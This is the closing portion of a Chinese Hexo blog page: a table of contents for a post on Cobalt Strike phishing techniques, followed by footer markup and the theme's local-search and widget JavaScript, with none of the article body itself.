                      
                    
                      
                    
                      
                    
                    <span class="site-state-item-count">16</span>
                    <span class="site-state-item-name">分类</span>
                  </a>
                </div>
              

              
            </nav>
          

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
              
                <span class="links-of-author-item">
                  
                  
                    
                  
                  
                    
                  
                  <a href="https://weibo.com/6791921870/" title="Weibo &rarr; https://weibo.com/6791921870/" rel="noopener" target="_blank"><i class="fa fa-fw fa-weibo"></i>Weibo</a>
                </span>
              
            </div>
          

          

          
          

          
            
          
          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Cobalt-Strike简介："><span class="nav-number">1.</span> <span class="nav-text">Cobalt Strike简介：</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Cobalt-Strike的安装"><span class="nav-number">2.</span> <span class="nav-text">Cobalt Strike的安装</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#配置客户端"><span class="nav-number">2.0.1.</span> <span class="nav-text">配置客户端</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#进入后首先配置监听器："><span class="nav-number">2.0.2.</span> <span class="nav-text">进入后首先配置监听器：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#生成payload："><span class="nav-number">2.0.3.</span> <span class="nav-text">生成payload：</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#office钓鱼"><span class="nav-number">2.1.</span> <span class="nav-text">office钓鱼</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#具体操作："><span class="nav-number">2.1.1.</span> <span class="nav-text">具体操作：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#word操作"><span class="nav-number">2.1.2.</span> <span class="nav-text">word操作</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#CVE-2017-11882漏洞简介"><span class="nav-number">2.2.</span> <span class="nav-text">CVE-2017-11882漏洞简介</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#漏洞影响："><span class="nav-number">2.2.1.</span> <span class="nav-text">漏洞影响：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#复现："><span class="nav-number">2.2.2.</span> <span class="nav-text">复现：</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#CHM钓鱼"><span class="nav-number">2.3.</span> <span class="nav-text">CHM钓鱼</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#CHM介绍"><span class="nav-number">2.3.1.</span> <span class="nav-text">CHM介绍</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#CHM制作过程："><span class="nav-number">2.3.2.</span> <span class="nav-text">CHM制作过程：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#生成钓鱼文件"><span class="nav-number">2.3.3.</span> <span class="nav-text">生成钓鱼文件</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#LNK钓鱼"><span class="nav-number">2.4.</span> <span class="nav-text">LNK钓鱼</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#先做个简单的powershell生产图标："><span class="nav-number">2.4.1.</span> <span class="nav-text">先做个简单的powershell生产图标：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#钓鱼方法："><span class="nav-number">2.4.2.</span> <span class="nav-text">钓鱼方法：</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#HTA钓鱼"><span class="nav-number">2.5.</span> <span class="nav-text">HTA钓鱼</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#复现：-1"><span class="nav-number">2.5.1.</span> <span class="nav-text">复现：</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#网站克隆"><span class="nav-number">2.6.</span> <span class="nav-text">网站克隆</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#后渗透阶段"><span class="nav-number">2.7.</span> <span class="nav-text">后渗透阶段</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love" id="animate">
    <i class="fa fa-heart" id="heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">guolala</span>

  

  
</div>

<!--
  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v3.8.0</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> v6.5.0</div>


-->

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv" title="总访客量">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
    </span>
  

  
    <span class="site-pv" title="总访问量">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
    </span>
  
</div>









        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    
	
    

    
  </div>

  <script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js">
  </script>
  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>














  
    
      
        
      
  
  <script type="text/javascript" color="0,0,255" opacity="0.5" zindex="-1" count="99" src="true"></script>













  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.5.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.5.0"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.5.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.5.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.5.0"></script>



  



  










  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  

  

  
  

  

  

  

  

  

  

  <script type="text/javascript" src="/js/src/love.js"></script>
<script src="/live2dw/lib/L2Dwidget.min.js?0c58a1486de42ac6cc1c59c7d98ae887"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","model":{"jsonPath":"/live2dw/assets/assets/wanko.model.json"},"display":{"position":"left","width":150,"height":300},"mobile":{"show":true},"log":false,"tagMode":false});</script></body>
</html>